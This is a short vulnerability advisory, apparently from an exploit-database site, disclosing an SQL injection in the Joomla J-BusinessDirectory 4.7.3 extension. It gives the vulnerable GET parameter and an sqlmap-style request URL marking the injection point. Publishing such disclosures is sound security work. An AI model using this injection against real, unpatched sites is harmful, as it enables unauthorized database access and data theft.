Joomla J-BusinessDirectory 4.7.3 SQL Injection

2018.01.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################ #Title: Joomla J-BusinessDirectory 4.7.3 -SQL injection #Credit: Bilal KARDADOU #Vendor: http://www.cmsjunkie.com/j-business-directory #URL: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/j-businessdirectory/ #Product: 'Joomla J-BusinessDirectory 4.7.3' #Developer: CMSJunkie #Extension type: Plugin #Last updated: Dec 31 2017 #Compatibility: 3.X #Type: Paid download #Google Dork: inurl:"Google is your Friend" ################################################ # # Description: # J-BusinessDirectory is the most advanced directory extension for Joomla!. It allows you to create now the # professional directory you've always dreamed of. You can create and efficiently manage any type of directory. # With the abundance of features like no other extension, it will provide you the right recipe for success. # Compatible with Joomla!3.7. # # # --Method=GET -p [term] # # -u " http://127.0.0.1/j-businessdirectory/directory/j-konnect/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=1&term=he/'ll/o'[SQLI] " # # PoC: # https://prnt.sc/hvx6pn # # Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top